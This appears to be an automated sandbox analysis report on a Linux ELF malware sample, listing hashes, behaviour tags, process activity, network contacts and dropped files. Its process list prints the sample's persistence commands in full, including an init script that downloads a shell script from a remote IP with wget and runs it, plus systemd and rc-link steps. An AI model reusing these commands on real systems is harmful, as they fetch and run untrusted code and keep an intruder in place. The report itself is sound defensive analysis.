Malware Analysis Report

2025-05-28 20:28

Sample ID 241125-dls4bavpdw
Target e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf
SHA256 e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911
Tags
antivm defense_evasion discovery persistence privilege_escalation
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911

Threat Level: Shows suspicious behavior

The file e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm defense_evasion discovery persistence privilege_escalation

File and Directory Permissions Modification

Modifies Watchdog functionality

Creates/modifies environment variables

Modifies init.d

Modifies systemd

Checks mountinfo of local process

Modifies rc script

Modifies Bash startup script

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-25 03:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-25 03:06

Reported

2024-11-25 03:08

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

148s

Max time network

128s

Command Line

[/tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/sh N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /bin/sh N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A
File opened for modification /dev/misc/watchdog /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A

Checks mountinfo of local process

antivm
Description Indicator Process Target
File opened for reading /proc/2629/mountinfo /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A

Creates/modifies environment variables

persistence privilege_escalation defense_evasion
Description Indicator Process Target
File opened for modification /etc/profile /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/system /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A
File opened for modification /etc/init.d/sh /bin/sh N/A

Modifies rc script

persistence
Description Indicator Process Target
File opened for modification /etc/rc.local /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A

Modifies systemd

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/systemd/system/custom.service /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A

Modifies Bash startup script

persistence
Description Indicator Process Target
File opened for modification /etc/profile /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself N/A /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/status /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A
File opened for reading /proc/1/cgroup /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A
File opened for reading /proc/filesystems /usr/bin/systemctl N/A
File opened for reading /proc/filesystems /usr/bin/mkdir N/A

Processes

/tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf

[/tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf]

/bin/sh

[sh -c systemctl enable custom.service >/dev/null 2>&1]

/usr/bin/systemctl

[systemctl enable custom.service]

/bin/sh

[sh -c chmod +x /etc/init.d/system >/dev/null 2>&1]

/usr/bin/chmod

[chmod +x /etc/init.d/system]

/bin/sh

[sh -c ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1]

/usr/bin/ln

[ln -s /etc/init.d/system /etc/rcS.d/S99system]

/bin/sh

[sh -c echo "#!/bin/sh # /etc/init.d/sh case \"$1\" in start) echo 'Starting sh' /bin/sh & wget http://193.143.1.70/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) $0 stop $0 start ;; *) echo \"Usage: $0 {start|stop|restart}\" exit 1 ;; esac exit 0" > /etc/init.d/sh]

/bin/sh

[sh -c chmod +x /etc/init.d/sh >/dev/null 2>&1]

/usr/bin/chmod

[chmod +x /etc/init.d/sh]

/bin/sh

[sh -c mkdir -p /etc/rc.d >/dev/null 2>&1]

/usr/bin/mkdir

[mkdir -p /etc/rc.d]

/bin/sh

[sh -c ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1]

/usr/bin/ln

[ln -s /etc/init.d/sh /etc/rc.d/S99sh]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 154.216.19.139:199 tcp
US 154.216.19.139:199 tcp
US 154.216.19.139:199 tcp

Files

/etc/systemd/system/custom.service

MD5 19a440fdac7f578f2fb33719698a082c
SHA1 ebadce21c65d05ad62a324deb39c57aecd3edf2c
SHA256 b176d41b748466f8ba35246c78a1c940f65403b363c086ccd5b5de577a87cf69
SHA512 8bdfac90e7235fc35eeec141a1e2145ed4ea5a250b71bdf0cf0e5e5aa59ab6dc004dc08561bd5547c4a4a106138c98950dc2098c905ce785b9b2c0657684d7bb

/etc/inittab

MD5 3d6b6e1b05ad5d0538ccd8804bcd279b
SHA1 0fc061b51c225d5bea072c939de05e8a856558bc
SHA256 cab2df9c1c498df29445837610f14ae08d4af98d3acac69b0581c01fe594e3c5
SHA512 1957857cffbc0d526eb04e40db166d661b9dc59fc31fb5551f31cd58d270f839ffa2098e81c8555b12e9dbd55ba17df662b14c6441a6389eb9a76082fa401c98

/boot/bootcmd

MD5 735cae7d3cbab0f59d95f84790282103
SHA1 1cb77931b3097f18988016c9ceba3280a5ccb2ae
SHA256 dfdd4cf729384e4ed52516ab72bd86be286c80f53d4f5b764fd2dd2a2b2c983b
SHA512 998daa467c4ee63dd41515897728de70cbb9c579ca8b16c26d8e6db5edad53c6dbd6343fb10eda3dbc29b0cb1fa72a9b2653250e9027e6ee02d17726e958bbfe

/etc/init.d/system

MD5 f000251d92c773cc3ee1ca22cf5f0788
SHA1 e2386fe6a5f29b1e9e5ad5b38928c024f97105e6
SHA256 31a77745dd3724a0691a9255738b9c87516868932e3eb992e2afafcd0574a985
SHA512 0dad5adaa7742dd208596fefad53ab21c39fbf2cbe5c9958b92170d555d316f0a0b02ec5236311b869aa18e90592e81439a3a229bf1307b5daf87d87c5f493c2

/etc/init.d/sh

MD5 c5583b6a699f62cb0a004c99842f5c70
SHA1 b232ef89bf9b36643b5956aaacfd295b9ce2a0a7
SHA256 2b03c83558e4af71f3b35408cf668a2ee06931c21adec760952a21a11bc4c59b
SHA512 a9fc1e4c30452a3d100a8ccfbb707d9d323830fbbca90c98d3c126bf943539baaf1fccb04d435a4b627ed7f1bfb1bbd649dab282488d951dde87e097423e154d

/etc/motd

MD5 2bd9b4be30579e633fc0191aa93df486
SHA1 7d63a9bd9662e86666b27c1b50db8e7370c624ff
SHA256 64dc39f3004dc93c9fc4f1467b4807f2d8e3eb0bfa96b15c19cd8e7d6fa77a1d
SHA512 ae6dd7b39191354cf43cf65e517460d7d4c61b8f5c08e33e6ca3c451dc7cab4de89f33934c89396b80f1aade0a4e2571bd5ae8b76ef80b737d4588703d2814d5